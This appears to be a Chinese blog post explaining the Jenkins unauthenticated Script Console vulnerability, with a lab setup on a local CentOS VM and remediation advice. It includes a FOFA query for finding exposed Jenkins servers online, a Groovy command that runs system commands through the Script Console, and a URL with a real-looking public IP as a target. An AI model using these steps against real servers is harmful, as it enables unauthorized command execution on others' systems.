Jenkins未授权访问漏洞

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

实在找不到

靶场复现

环境准备

虚拟机centos IP:192.168.30.138

下载安装包,版本1.620.1.1.norach

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm

安装Jenkins

rpm -ivh jenkins-1.620-1.1.noarch.rpm

启动Jenkins服务

service jenkins start

关闭防火墙或放行8080端口

systemctl stop firewalld.service

访问服务地址

http://192.168.30.138:8080/manage

http://192.168.30.138:8080/script

#执行命令
println "whoami".execute().text  


漏洞修复

  1. 升级版本。
  2. 添加认证,设置强密码复杂度及账号锁定。
  3. 禁止把Jenkins直接暴露在公网。
相关推荐
萨格拉斯救世主5 分钟前
jenkins使用slave节点进行node打包报错问题处理
运维·jenkins
川石课堂软件测试16 分钟前
性能测试|docker容器下搭建JMeter+Grafana+Influxdb监控可视化平台
运维·javascript·深度学习·jmeter·docker·容器·grafana
pk_xz1234562 小时前
Shell 脚本中变量和字符串的入门介绍
linux·运维·服务器
小珑也要变强2 小时前
Linux之sed命令详解
linux·运维·服务器
Lary_Rock4 小时前
RK3576 LINUX RKNN SDK 测试
linux·运维·服务器
一坨阿亮7 小时前
Linux 使用中的问题
linux·运维
wclass-zhengge9 小时前
Docker篇(Docker Compose)
运维·docker·容器
李启柱10 小时前
项目开发流程规范文档
运维·软件构建·个人开发·设计规范
力姆泰克11 小时前
看电动缸是如何提高农机的自动化水平
大数据·运维·服务器·数据库·人工智能·自动化·1024程序员节
Lionhacker11 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术